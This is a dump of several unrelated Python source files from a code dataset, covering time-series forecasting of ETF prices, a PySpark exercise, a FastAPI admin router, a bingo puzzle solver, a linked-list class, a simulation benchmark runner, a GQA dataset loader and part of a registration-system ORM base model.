df_nas.close.expanding().mean()\n\tfig = plt.figure()\n\tdf_300.close.plot()\n\texpanding_300.plot()\n\tplt.savefig(\"expanding300.png\")\n\tfig = plt.figure()\n\tdf_nas.close.plot()\n\texpanding_nas.plot()\n\tplt.savefig(\"expandingNAS.png\")\n\tplt.close()\n\t# 两个指数的自相关性和部分自相关性\n\t# 自相关\n\tfig = plt.figure()\n\tplot_acf(df_300[\"close\"], lags = 25, title = \"300ETF\")\n\tplt.savefig(\"300acf.png\")\n\tfig = plt.figure()\n\tplot_acf(df_nas[\"close\"], lags = 25, title = \"nasETF\")\n\tplt.savefig(\"nasacf.png\")\n\t# 部分自相关\n\tfig = plt.figure()\n\tplot_pacf(df_300[\"close\"], lags = 25, title = \"300pETF\")\n\tplt.savefig(\"300pacf.png\")\n\tfig = plt.figure()\n\tplot_pacf(df_nas[\"close\"], lags = 25, title = \"naspETF\")\n\tplt.savefig(\"naspacf.png\")\n\t\n\t# 数据的趋势,季节性和噪音\n\t# plt.close()\n\t# 分解\n\t# fig = plt.figure()\n\tplt.rcParams[\"figure.figsize\"] = 11,9\n\tdecomposed_300 = sm.tsa.seasonal_decompose(df_300[\"close\"], freq = 360)\n\tfig = decomposed_300.plot()\n\tfig.savefig(\"decompose_300.png\")\n\tdecomposed_nas = sm.tsa.seasonal_decompose(df_nas[\"close\"], freq = 360)\n\tfig = decomposed_nas.plot()\n\tfig.savefig(\"decompose_nas.png\")\n\t\n\t# 用单位根检验方法来检验两个序列是否是随机行走的\n\tfrom statsmodels.tsa.stattools import adfuller\n\tadf_300 = adfuller(df_300[\"close\"])\n\tprint(\"300etf的单位根检验p值=%lf\" % adf_300[1])\n\tadf_nas = adfuller(df_nas[\"close\"])\n\tprint(\"NASetf的单位根检验p值=%lf\" % adf_nas[1])\n\t\n\t# 序列和序列差分的稳定性\n\tfig = plt.figure()\n\tplt.subplot(211)\n\tdecomposed_300.trend.plot()\n\tplt.subplot(212)\n\tdecomposed_300.trend.diff().plot()\n\tfig.savefig(\"stand300.png\")\n\tfig = plt.figure()\n\tplt.subplot(211)\n\tdecomposed_nas.trend.plot()\n\tplt.subplot(212)\n\tdecomposed_nas.trend.diff().plot()\n\tfig.savefig(\"standnas.png\")\n\t\n\t# 建立模型预测\n\t# AR模型\n\tfrom statsmodels.tsa.arima_model import ARMA\n\tdf300_model = ARMA(df_300[\"close\"].diff().iloc[1:].values, order = (1, 0))\n\tdf300_res = df300_model.fit()\n\tfig = plt.figure()\n\tfig = df300_res.plot_predict(start = 1000, end = 1100)\n\tfig.savefig(\"ar_300.png\")\n\tprint(df300_res.summary())\n\t# print(\"模型误差:%f\" % pre_error(df_300[\"close\"].diff().iloc[1:].values[1000:1100], df300_res.predict(start = 1000, end = 1100)))\n\tdfnas_model = ARMA(df_nas[\"close\"].diff().iloc[1:].values, order = (1, 0))\n\tdfnas_res = dfnas_model.fit()\n\tfig = plt.figure()\n\tfig = dfnas_res.plot_predict(start = 1000, end = 1100)\n\tfig.savefig(\"ar_nas.png\")\n\tprint(dfnas_res.summary())\n\t\n\t# MA模型\n\tdf300_ma = ARMA(df_300[\"close\"].diff().iloc[1:].values, order = (0, 1))\n\tdf300_res = df300_ma.fit()\n\tfig = plt.figure()\n\tfig = df300_res.plot_predict(start = 1000, end = 1100)\n\tfig.savefig(\"ma_300.png\")\n\tprint(df300_res.summary())\n\t# print(\"模型误差:%f\" % pre_error(df_300[\"close\"].diff().iloc[1:].values[1000:1100], df300_res.predict(start = 1000, end = 1100)))\n\tdfnas_ma = ARMA(df_nas[\"close\"].diff().iloc[1:].values, order = (0, 1))\n\tdfnas_res = dfnas_ma.fit()\n\tfig = plt.figure()\n\tfig = dfnas_res.plot_predict(start = 1000, end = 1100)\n\tfig.savefig(\"ma_nas.png\")\n\tprint(dfnas_res.summary())\n\t\n\t# ARMA模型\n\tdf300_arma = ARMA(df_300[\"close\"].diff().iloc[1:].values, order = (3, 3))\n\tdf300_res = df300_arma.fit()\n\tfig = plt.figure()\n\tfig = df300_res.plot_predict(start = 1000, end = 1100)\n\tfig.savefig(\"arma_300.png\")\n\tprint(df300_res.summary())\n\t# print(\"模型误差:%f\" % pre_error(df_300[\"close\"].diff().iloc[1:].values[1000:1100], df300_res.predict(start = 1000, end = 
1100)))\n\t#dfnas_arma = ARMA(df_nas[\"close\"].diff().iloc[1:].values, order = (3, 3))\n#\tdfnas_res = dfnas_arma.fit()\n#\tfig = plt.figure()\n#\tfig = dfnas_res.plot_predict(start = 1000, end = 1100)\n#\tfig.savefig(\"arma_nas.png\")\n#\tprint(dfnas_res.summary())\n\n\t# ARIMA模型\n\tfrom statsmodels.tsa.arima_model import ARIMA\n\tdf300_arima = ARIMA(df_300[\"close\"].diff().iloc[1:].values, order = (2, 1, 0))\n\tdf300_res = df300_arima.fit()\n\tfig = plt.figure()\n\tfig = df300_res.plot_predict(start = 1000, end = 1100)\n\tfig.savefig(\"arima_300.png\")\n\tprint(df300_res.summary())\n\t\n\t# VAR模型\n\t#train_sample = pd.concat([norm_300.diff().iloc[1:], norm_nas.diff().iloc[1:]], axis = 1)\n#\tmodel = sm.tsa.VARMAX(train_sample, order = (2, 1), trend = \"c\")\n#\tresult = model.fit(maxiter = 1000, disp = True)\n#\tprint(result.summary())\n#\tfig = result.plot_diagnostics()\n#\tfig.savefig(\"var_dio.png\")\n#\tpre_res = result.predict(start = 1000, end = 1100)\n#\tfig = plt.figure()\n#\tplt.plot(pre_res)\n#\tfig.savefig(\"var_pre.png\")\n\t\n\t# SARIMA模型\n#\ttrain_sample = df_300[\"close\"].diff().iloc[1:].values\n#\tmodel = sm.tsa.SARIMAX(train_sample, order = (4, 0, 4), trend = \"c\")\n#\tresult = model.fit(maxiter = 1000, disp = True)\n#\tprint(result.summary())\n#\tfig = plt.figure()\n#\tplt.plot(train_sample[1:600], color = \"red\")\n#\tplt.plot(result.predict(start = 0, end = 600), color = \"blue\")\n#\tfig.savefig(\"SARIMA.png\")\n\t\n\t# 未观察成分模型\n\ttrain_sample = df_300[\"close\"].diff().iloc[1:].values\n\tmodel = sm.tsa.UnobservedComponents(train_sample, \"local level\")\n\tresult = model.fit(maxiter = 1000, disp = True)\n\tprint(result.summary())\n\tfig = plt.figure()\n\tplt.plot(train_sample[1:600], color = \"red\")\n\tplt.plot(result.predict(start = 0, end = 600), color = \"blue\")\n\tfig.savefig(\"unobserve.png\")\n\t\n\t# 动态因子模型\n\ttrain_sample = pd.concat([norm_300.diff().iloc[1:], norm_nas.diff().iloc[1:]], axis = 1)\n\tmodel = sm.tsa.DynamicFactor(train_sample, k_factors = 1, factor_order = 2)\n\tresult = model.fit(maxiter = 1000, disp = True)\n\tprint(result.summary())\n\tpredicted_result = result.predict(start = 0, end = 1000)\n\tfig = plt.figure()\n\tplt.plot(train_sample[:500], color = \"red\")\n\tplt.plot(predicted_result[:500], color = \"blue\")\n\tfig.savefig(\"dfmodel.png\")\n\t","repo_name":"zwdnet/MyQuant","sub_path":"12/times.py","file_name":"times.py","file_ext":"py","file_size_in_byte":9209,"program_lang":"python","lang":"en","doc_type":"code","stars":207,"dataset":"github-code","pt":"3"}
+{"seq_id":"5461238649","text":"import sys\nfrom pyspark import SparkContext, SparkConf\n\nconf = SparkConf().setAppName(\"Introductietraining-Spark\").setMaster(\"local[1]\")\nsc = SparkContext(conf = conf)\nsc.setLogLevel(\"ERROR\")\n\n# Oefening 6\n# Maak een RDD van van het bestand sales.csv in de map bestanden\n# Toon 2010 per genre het aantal records\n#\n# Sla het python script op\n# en voer het script uit in het terminal-venster onder in het scherm d.m.v. het commando \n# spark-submit Oefeningen-hoofdstuk-4-Transformaties/Oefening6.py\n\nsalesRdd = sc.textFile(\"Bestanden/sales.csv\")\nheader = salesRdd.first()\nsalesClean = salesRdd.filter(lambda x: x != header).filter(lambda line: line.split(\",\")[3]!=\"N/A\")\n\ngenres2010 = salesClean.map(lambda x: x.split(\",\")) \\\n .filter(lambda x: x[3]==\"2010\") \\\n .map(lambda x:x[4]) \\\n .countByValue()\n\nfor genre, count in genres2010.items():\n print(\"{} : {}\".format(genre, count))","repo_name":"martinsuijs/Introductie-training-spark","sub_path":"introductie-training-spark/Uitwerkingen-hoofdstuk-4-Transformaties/Oefening6.py","file_name":"Oefening6.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"2121748902","text":"# верификация пользователей\n# верификация мероприятий\n# удаление пользователей\n\n\nfrom fastapi import APIRouter, HTTPException, Security, status\n\nfrom app.dependencies import anauthorized_exception, get_current_user\nfrom app.models.responses import UserResponse\nfrom app.models.user import User\nfrom app.services import user\n\nrouter = APIRouter(tags=[\"administration\"])\n\n\nasync def check(current_user: User, username: str, err_msg: str) -> None:\n if not current_user:\n raise anauthorized_exception\n\n if current_user.info.username == username:\n raise HTTPException(\n status_code=status.HTTP_409_CONFLICT,\n detail=\"You are cannot delete your account!\",\n )\n\n\n@router.delete(\"/user\")\nasync def deleting_user(\n username: str,\n current_user: User = Security(get_current_user, scopes=[\"administrator\"]),\n) -> UserResponse:\n \"\"\"Удаление конкретного пользователя\"\"\"\n\n await check(current_user, username, err_msg=\"You are cannot delete your account!\")\n\n return await user.delete(username)\n\n\n@router.patch(\"/verify\")\nasync def verify_user(\n username: str, current_user: User = Security(get_current_user, scopes=[\"administrator\"])\n) -> UserResponse:\n \"\"\"Верификация пользователя\"\"\"\n\n await check(current_user, username, err_msg=\"Could not verify yourself!\")\n\n return await user.verify(username)\n\n\n# @router.post(\"/verify/event\")\n# async def verify_event(\n# event: int, current_user: User | None = Depends(get_current_user)\n# ) -> VerificationResponse:\n# \"\"\"Вери��икация мероприятий\"\"\"\n# pass\n","repo_name":"Mawwlle/arrange-it","sub_path":"app/api/user/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39204141348","text":"\nimport itertools\n\n\nclass board:\n\n def __init__(self, input):\n self._board = {}\n self._row = [0] * 5 \n self._column = [0] * 5\n self._marked = [0] * 25\n self._complete_line = [False] * 10\n self._complete = False\n self._marked_sum = 0 \n self.make_board(input)\n\n # should have used numpy\n def make_board(self,input):\n for i in range(0,5):\n for j in range(0,5):\n self._board[input[(5*i) + j]] = (i,j)\n \n def in_board(self,number):\n\n try:\n x,y = self._board[number]\n self._row[x] +=1\n if self._row[x] == 5:\n self._complete_line[x] = True\n self._complete = True \n self._column[y] +=1\n if self._column[y] == 5:\n self._complete_line[5+y] = True\n self._complete = True \n self._marked_sum += number\n return True\n\n except KeyError:\n return False \n\n #this can be a getter.\n def win(self):\n return self._complete\n\n def unmarked_score(self):\n total = 0\n for key in self._board.keys():\n total +=key\n return total-self._marked_sum\n\n def reset(self):\n self._row = [0] * 5 \n self._column = [0] * 5\n self._marked = [0] * 25\n self._complete_line = [False] * 10\n self._complete = False\n self._marked_sum = 0\n return self\n\n\n\ndef reader(filename):\n\n draws = 0\n boards = []\n with open(filename,\"r\") as file:\n data = [line.strip() for line in file]\n draws = [int(x) for x in data[0].split(\",\")]\n\n for idx in range(2,len(data),6):\n to_int = lambda x: [int(x) for x in data[x].split()]\n\n boards.append(list(itertools.chain(to_int(idx), to_int(idx+1), to_int(idx+2), to_int(idx+3), to_int(idx+4))))\n\n return draws,boards\n \n\n# part a \n\ndraws,board_sets = reader(\"4_input.txt\")\n\nboard_obj = [board(x) for x in board_sets]\n\nwin_board = None\nwin_num = -1\nfor num in draws:\n for tile in board_obj:\n if tile.in_board(num):\n if tile.win():\n win_board = tile\n win_num = num\n break\n\n if win_num != -1:\n break\n\nprint(win_num*win_board.unmarked_score())\n\n\n#part b \nf = lambda x: x.reset()\nboard_obj = [f(tile) for tile in board_obj]\n\nlast_win_board = None\nlast_win_num = -1 \nfor num in draws:\n for idx,tile in enumerate(board_obj):\n\n # if board has already been completed skip\n if tile.win():\n continue\n if tile.in_board(num):\n if tile.win():\n last_win_board = tile\n last_win_num = num\n\nprint(last_win_num*last_win_board.unmarked_score())\n","repo_name":"MaazJamal/AOC2021","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73725197842","text":"#insert at a node \nclass Node :\n def __init__(self,data,next):\n self.data=data\n self.next=next\nclass LinkedList:\n head =None\n def insertAtbegining(self,data):\n node=Node(data,self.head)\n self.head=node\n def print(self):\n if self.head is None:\n print(\"linkList is empty\")\n return\n ltsr=''\n itr=self.head\n while itr:\n ltsr+=str(itr.data)\n itr=itr.next\n print(ltsr)\n def insert_At_end(self,data):\n if self.head is None:\n self.head=Node(data,None)\n return\n itr=self.head\n while itr:\n itr=itr.next\n itr.next=Node(data,None)\n def get_length(self):\n count=0\n itr=self.head\n while itr:\n count+=1\n itr=itr.next\n return count\n def remove_At(self,index):\n if index <0 or index>=self.get_length():\n raise Exception(\"invalid index\")\n if index== 0:\n self.heaf =self.head.next\n return\n count =0\n itr=self.head\n while itr:\n \n if count == index-1:\n itr.next=itr.next.next\n break\n\n itr=itr.next\n count +=1\n def insert_At(self,index,data):\n if index <0 or index>=self.get_length():\n raise Exception(\"invalid index\")\n if index ==0:\n self.insertAtbegining(data)\n return\n count =0\n itr=self.head\n while itr:\n \n if count == index-1:\n node=Node(data,itr.next)\n itr.next=node\n break\n itr=itr.next\n count+=1\n\n\n\n\n \n \nif __name__ =='__main__':\n lt=LinkedList()\n lt.insertAtbegining(1)\n lt.insertAtbegining(2)\n lt.print()\n","repo_name":"asujan205/DataStructure-using-python","sub_path":"linklist.py","file_name":"linklist.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18680950438","text":"#!/usr/bin/env python3\n\nimport subprocess\n\niterations = 3\ntime = 0.\nfor i in range(1, iterations+1):\n print(\"running Spatiocyte, iteration\", i, \"of\", iterations)\n result = subprocess.run(['ecell3-session', 'model.py'],\n stdout=subprocess.PIPE)\n time = time + float(result.stdout.decode('utf-8').split('\\n')[-2].\n split(' ')[-1])\ntime = time/iterations\nprint(\"elapsed time (s):\", time)\n\nwith open(\"elapsed_time.txt\", \"w+\") as f:\n f.write(\"%f\" % time)\n","repo_name":"satya-arjunan/pspatiocyte","sub_path":"src/pspatiocyte/models/benchmark/spatiocyte/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"72615121361","text":"import json\nfrom pathlib import Path\n\nimport torch\nimport torchvision\nfrom transformers import RobertaTokenizerFast\n\nfrom .coco import ConvertCocoPolysToMask, ModulatedDetection, make_coco_transforms\n\n\nclass GQADetection(ModulatedDetection):\n pass\n\n\nclass GQAQuestionAnswering(torchvision.datasets.CocoDetection):\n def __init__(self, img_folder, ann_file, transforms, return_masks, return_tokens, tokenizer, ann_folder):\n super(GQAQuestionAnswering, self).__init__(img_folder, ann_file)\n self._transforms = transforms\n self.prepare = ConvertCocoPolysToMask(return_masks, return_tokens, tokenizer=tokenizer)\n with open(ann_folder / \"gqa_answer2id.json\", \"r\") as f:\n self.answer2id = json.load(f)\n with open(ann_folder / \"gqa_answer2id_by_type.json\", \"r\") as f:\n self.answer2id_by_type = json.load(f)\n self.type2id = {\"obj\": 0, \"attr\": 1, \"rel\": 2, \"global\": 3, \"cat\": 4}\n\n def __getitem__(self, idx):\n img, target = super(GQAQuestionAnswering, self).__getitem__(idx)\n image_id = self.ids[idx]\n coco_img = self.coco.loadImgs(image_id)[0]\n caption = coco_img[\"caption\"]\n dataset_name = coco_img[\"dataset_name\"]\n questionId = coco_img[\"questionId\"]\n target = {\"image_id\": image_id, \"annotations\": target, \"caption\": caption}\n img, target = self.prepare(img, target)\n if self._transforms is not None:\n img, target = self._transforms(img, target)\n target[\"dataset_name\"] = dataset_name\n target[\"questionId\"] = questionId\n\n if coco_img[\"answer\"] not in self.answer2id:\n answer = \"unknown\"\n else:\n answer = coco_img[\"answer\"]\n\n target[\"answer\"] = torch.as_tensor(self.answer2id[answer], dtype=torch.long)\n target[\"answer_type\"] = torch.as_tensor(self.type2id[coco_img[\"question_type\"]], dtype=torch.long)\n\n if coco_img[\"answer\"] not in self.answer2id_by_type[\"answer_attr\"]:\n answer = \"unknown\"\n else:\n answer = coco_img[\"answer\"]\n target[\"answer_attr\"] = torch.as_tensor(\n self.answer2id_by_type[\"answer_attr\"][answer] if coco_img[\"question_type\"] == \"attr\" else -100,\n dtype=torch.long,\n )\n\n if coco_img[\"answer\"] not in self.answer2id_by_type[\"answer_global\"]:\n answer = \"unknown\"\n else:\n answer = coco_img[\"answer\"]\n target[\"answer_global\"] = torch.as_tensor(\n self.answer2id_by_type[\"answer_global\"][answer] if coco_img[\"question_type\"] == \"global\" else -100,\n dtype=torch.long,\n )\n\n if coco_img[\"answer\"] not in self.answer2id_by_type[\"answer_rel\"]:\n answer = \"unknown\"\n else:\n answer = coco_img[\"answer\"]\n target[\"answer_rel\"] = torch.as_tensor(\n self.answer2id_by_type[\"answer_rel\"][answer] if coco_img[\"question_type\"] == \"rel\" else -100,\n dtype=torch.long,\n )\n\n if coco_img[\"answer\"] not in self.answer2id_by_type[\"answer_cat\"]:\n answer = \"unknown\"\n else:\n answer = coco_img[\"answer\"]\n target[\"answer_cat\"] = torch.as_tensor(\n self.answer2id_by_type[\"answer_cat\"][answer] if coco_img[\"question_type\"] == \"cat\" else -100,\n dtype=torch.long,\n )\n\n if coco_img[\"answer\"] not in self.answer2id_by_type[\"answer_obj\"]:\n answer = \"unknown\"\n else:\n answer = coco_img[\"answer\"]\n target[\"answer_obj\"] = torch.as_tensor(\n self.answer2id_by_type[\"answer_obj\"][answer] if coco_img[\"question_type\"] == \"obj\" else -100,\n dtype=torch.long,\n )\n return img, target\n\n\ndef build(image_set, args):\n img_dir = Path(args.vg_img_path)\n assert img_dir.exists(), f\"provided VG img path {img_dir} does not exist\"\n\n 
tokenizer = RobertaTokenizerFast.from_pretrained(args.text_encoder_type)\n\n if args.do_qa:\n assert args.gqa_split_type is not None\n\n if image_set == \"train\":\n datasets = []\n for imset in [\"train\", \"val\"]:\n ann_file = Path(args.gqa_ann_path) / f\"finetune_gqa_{imset}_{args.gqa_split_type}.json\"\n\n datasets.append(\n GQAQuestionAnswering(\n img_dir,\n ann_file,\n transforms=make_coco_transforms(image_set, cautious=True),\n return_masks=args.masks,\n return_tokens=True,\n tokenizer=tokenizer,\n ann_folder=Path(args.gqa_ann_path),\n )\n )\n\n return torch.utils.data.ConcatDataset(datasets)\n elif image_set == \"val\":\n ann_file = Path(args.gqa_ann_path) / f\"finetune_gqa_testdev_balanced.json\"\n\n return GQAQuestionAnswering(\n img_dir,\n ann_file,\n transforms=make_coco_transforms(image_set, cautious=True),\n return_masks=args.masks,\n return_tokens=True,\n tokenizer=tokenizer,\n ann_folder=Path(args.gqa_ann_path),\n )\n elif image_set in [\"test\", \"challenge\", \"testdev\", \"submission\"]:\n ann_file = Path(args.gqa_ann_path) / f\"finetune_gqa_{image_set}_{args.gqa_split_type}.json\"\n\n return GQAQuestionAnswering(\n img_dir,\n ann_file,\n transforms=make_coco_transforms(\"val\", cautious=True),\n return_masks=args.masks,\n return_tokens=True,\n tokenizer=tokenizer,\n ann_folder=Path(args.gqa_ann_path),\n )\n\n else:\n assert False, f\"Unknown image set {image_set}\"\n\n else:\n # Only used for val during the pre-training phase\n ann_file = Path(args.gqa_ann_path) / f\"final_gqa_{image_set}.json\"\n dataset = GQADetection(\n img_dir,\n ann_file,\n transforms=make_coco_transforms(image_set, cautious=True),\n return_masks=args.masks,\n return_tokens=True,\n tokenizer=tokenizer,\n )\n return dataset\n","repo_name":"ashkamath/mdetr","sub_path":"datasets/gqa.py","file_name":"gqa.py","file_ext":"py","file_size_in_byte":6237,"program_lang":"python","lang":"en","doc_type":"code","stars":901,"dataset":"github-code","pt":"3"}
+{"seq_id":"22179117816","text":"import json\nimport operator\nimport os\nimport re\nimport uuid\nfrom collections import defaultdict\nfrom datetime import date, datetime, timedelta\nfrom functools import wraps\nfrom itertools import chain\nfrom uuid import uuid4\n\nimport bcrypt\nimport cherrypy\nimport six\nimport sqlalchemy\nfrom dateutil import parser as dateparser\nfrom pockets import cached_classproperty, classproperty, listify\nfrom pockets.autolog import log\nfrom pytz import UTC\nfrom residue import check_constraint_naming_convention, declarative_base, JSON, SessionManager, UTCDateTime, UUID\nfrom sideboard.lib import on_startup, stopped\nfrom sqlalchemy import and_, func, or_, not_\nfrom sqlalchemy.dialects.postgresql.json import JSONB\nfrom sqlalchemy.event import listen\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import Query, joinedload, subqueryload, aliased\nfrom sqlalchemy.orm.attributes import get_history, instance_state\nfrom sqlalchemy.schema import MetaData\nfrom sqlalchemy.types import Boolean, Integer, Float, Date, Numeric\nfrom sqlalchemy.util import immutabledict\n\nimport uber\nfrom uber.config import c, create_namespace_uuid\nfrom uber.errors import HTTPRedirect\nfrom uber.decorators import cost_property, department_id_adapter, presave_adjustment, suffix_property\nfrom uber.models.types import Choice, DefaultColumn as Column, MultiChoice\nfrom uber.utils import check_csrf, normalize_email_legacy, normalize_phone, DeptChecklistConf, report_critical_exception, \\\n valid_email, valid_password\nfrom uber.payments import ReceiptManager\n\n\ndef _make_getter(model):\n def getter(\n self, params=None, *, bools=(), checkgroups=(), allowed=(), restricted=False, ignore_csrf=False, **query):\n\n if query:\n return self.query(model).filter_by(**query).one()\n elif isinstance(params, str):\n return self.query(model).filter_by(id=params).one()\n else:\n params = params.copy()\n id = params.pop('id', 'None')\n if id == 'None':\n inst = model()\n else:\n inst = self.query(model).filter_by(id=id).one()\n\n if not ignore_csrf:\n assert not {k for k in params if k not in allowed} or cherrypy.request.method == 'POST', 'POST required'\n\n inst.apply(params, bools=bools, checkgroups=checkgroups, restricted=restricted, ignore_csrf=ignore_csrf)\n\n return inst\n return getter\n\n\n# Consistent naming conventions are necessary for alembic to be able to\n# reliably upgrade and downgrade versions. 
For more details, see:\n# http://alembic.zzzcomputing.com/en/latest/naming.html\nnaming_convention = {\n    'ix': 'ix_%(column_0_label)s',\n    'uq': 'uq_%(table_name)s_%(column_0_name)s',\n    'fk': 'fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s',\n    'pk': 'pk_%(table_name)s'}\n\nif not c.SQLALCHEMY_URL.startswith('sqlite'):\n    naming_convention['unnamed_ck'] = check_constraint_naming_convention\n    naming_convention['ck'] = 'ck_%(table_name)s_%(unnamed_ck)s'\n\nmetadata = MetaData(naming_convention=immutabledict(naming_convention))\n\n\n@declarative_base(metadata=metadata)\nclass MagModel:\n    id = Column(UUID, primary_key=True, default=lambda: str(uuid4()))\n\n    required = ()\n\n    @cached_classproperty\n    def NAMESPACE(cls):\n        return create_namespace_uuid(cls.__name__)\n\n    @cached_classproperty\n    def _class_attr_names(cls):\n        return [\n            s for s in dir(cls)\n            if s not in ('_class_attrs', '_class_attr_names') and\n            not s.startswith('_cached_')]\n\n    @cached_classproperty\n    def _class_attrs(cls):\n        return {s: getattr(cls, s) for s in cls._class_attr_names}\n\n    def _invoke_adjustment_callbacks(self, label):\n        callbacks = []\n        for name, attr in self._class_attrs.items():\n            if hasattr(attr, '__call__') and hasattr(attr, label):\n                callbacks.append(getattr(self, name))\n        callbacks.sort(key=lambda f: getattr(f, label))\n        for function in callbacks:\n            function()\n\n    def presave_adjustments(self):\n        self._invoke_adjustment_callbacks('presave_adjustment')\n\n    def predelete_adjustments(self):\n        self._invoke_adjustment_callbacks('predelete_adjustment')\n\n    @property\n    def email_to_address(self):\n        \"\"\"\n        The email address that our automated emails use when emailing this model.\n        In some rare cases, a model should have a column named `email` but not always use that in\n        automated emails -- override this instead.\n        \"\"\"\n        return self.email\n\n    @property\n    def gets_emails(self):\n        \"\"\"\n        In some cases, we want to apply a global filter to a model that prevents it from\n        receiving scheduled emails under certain circumstances. This property allows you\n        to define such a filter.\n        \"\"\"\n        return True\n\n    @property\n    def addons(self):\n        \"\"\"\n        This exists only to be overridden by other events; it should return a\n        list of strings which are the extra things that an attendee or group has\n        purchased. For example, in the MAGStock codebase, we've got code which\n        looks something like this::\n\n            @Session.model_mixin\n            class Attendee:\n                purchased_food = Column(Boolean, default=False)\n\n                @property\n                def addons(self):\n                    return ['Food'] if self.purchased_food else []\n\n        Our various templates use this information to display a summary to the\n        user of what they have purchased, e.g.
in the prereg confirmation page\n and in their confirmation emails.\n \"\"\"\n return []\n\n @cached_classproperty\n def cost_property_names(cls):\n \"\"\"Returns the names of all cost properties on this model.\"\"\"\n return [\n s for s in cls._class_attr_names\n if s not in ['cost_property_names']\n and isinstance(getattr(cls, s), cost_property)]\n\n @cached_classproperty\n def multichoice_columns(cls):\n return [c for c in cls.__table__.columns if isinstance(c.type, MultiChoice)]\n\n @property\n def default_cost(self):\n \"\"\"\n Returns the sum of all cost and credit receipt items for this model instance.\n\n Because things like discounts exist, we ensure default_cost will never\n return a negative value.\n \"\"\"\n receipt, receipt_items = ReceiptManager.create_new_receipt(self)\n \n return max(0, sum([(cost * count) for desc, cost, count in receipt_items]) / 100)\n\n @property\n def stripe_transactions(self):\n \"\"\"\n Returns all logged Stripe transactions with this model's ID.\n \"\"\"\n from uber.models.commerce import ReceiptTransaction\n return self.session.query(ReceiptTransaction).filter_by(fk_id=self.id).all()\n\n @cached_classproperty\n def unrestricted(cls):\n \"\"\"\n Returns a set of column names which are allowed to be set by non-admin\n attendees filling out one of the registration forms.\n \"\"\"\n return {col.name for col in cls.__table__.columns if not getattr(col, 'admin_only', True)}\n\n @cached_classproperty\n def all_bools(cls):\n \"\"\"Returns the set of Boolean column names for this table.\"\"\"\n return {col.name for col in cls.__table__.columns if isinstance(col.type, Boolean)}\n\n @cached_classproperty\n def all_checkgroups(cls):\n \"\"\"Returns the set of MultiChoice column names for this table.\"\"\"\n return {col.name for col in cls.__table__.columns if isinstance(col.type, MultiChoice)}\n\n @cached_classproperty\n def regform_bools(cls):\n \"\"\"Returns the set of non-admin-only Boolean columns for this table.\"\"\"\n return {colname for colname in cls.all_bools if colname in cls.unrestricted}\n\n @cached_classproperty\n def regform_checkgroups(cls):\n \"\"\"\n Returns the set of non-admin-only MultiChoice columns for this table.\n \"\"\"\n return {colname for colname in cls.all_checkgroups if colname in cls.unrestricted}\n\n @cached_classproperty\n def import_fields(cls):\n \"\"\"\n Allows event plugins to inject extra import fields for the API export.\n \"\"\"\n return []\n\n @classproperty\n def _extra_apply_attrs(cls):\n \"\"\"\n Returns a set of extra attrs used by apply(). These are settable\n attributes or properties that are not in cls.__table__columns.\n \"\"\"\n return set()\n\n @classproperty\n def _extra_apply_attrs_restricted(cls):\n \"\"\"\n Returns a set of extra attrs used by apply(restricted=True). 
These are\n settable attributes or properties that are not in cls.__table__columns.\n \"\"\"\n return set()\n\n def _get_relation_ids(self, relation):\n return getattr(self, '_relation_ids', {}).get(relation, (None, None))\n\n def _set_relation_ids(self, relation, ModelClass, ids):\n _relation_ids = getattr(self, '_relation_ids', {})\n _relation_ids[relation] = (ModelClass, ids)\n setattr(self, '_relation_ids', _relation_ids)\n\n @presave_adjustment\n def _convert_relation_ids_to_instances(self):\n _relation_ids = getattr(self, '_relation_ids', {})\n for relation, (ModelClass, ids) in _relation_ids.items():\n self.session.set_relation_ids(self, relation, ModelClass, ids)\n setattr(self, '_relation_ids', {})\n\n @property\n def session(self):\n \"\"\"\n Returns the session object which this model instance is attached to,\n or None if this instance is not attached to a session.\n \"\"\"\n return Session.session_factory.object_session(self)\n\n @classmethod\n def get_field(cls, name):\n \"\"\"Returns the column object with the provided name for this model.\"\"\"\n return cls.__table__.columns[name]\n\n def __eq__(self, m):\n return self.id is not None and isinstance(m, MagModel) and self.id == m.id\n\n def __ne__(self, m):\n return not (self == m)\n\n def __hash__(self):\n return hash(self.id)\n\n @property\n def is_new(self):\n \"\"\"\n Boolean property indicating whether or not this instance has already\n been saved to the database or if it's a new instance which has never\n been saved and thus has no corresponding row in its database table.\n \"\"\"\n return not instance_state(self).persistent\n\n @property\n def created(self):\n return self.get_tracking_by_instance(self, action=c.CREATED, last_only=True)\n\n @property\n def last_updated(self):\n return self.get_tracking_by_instance(self, action=c.UPDATED, last_only=True)\n\n @property\n def db_id(self):\n \"\"\"\n A common convention in our forms is to pass an \"id\" parameter of \"None\"\n for new objects and to pass the actual id for objects which already\n exist in our database, which lets the backend know whether to perform a\n save or an update. This method returns \"None\" for new objects and the\n id for existing objects, for use in such forms.\n \"\"\"\n return None if self.is_new else self.id\n\n def orig_value_of(self, name):\n \"\"\"\n Sometimes we mutate a model instance but then want to get the original\n value of a column before we changed it before we perform a save. This\n method returns the original value (i.e. the value currently in the db)\n for the column whose name is provided. If the value has not changed,\n this just returns the current value of that field.\n \"\"\"\n hist = get_history(self, name)\n return (hist.deleted or hist.unchanged or [getattr(self, name)])[0]\n\n @suffix_property\n def _ints(self, name, val):\n \"\"\"\n Given a column that uses a tuple of integers and strings, returns a\n list of integers. 
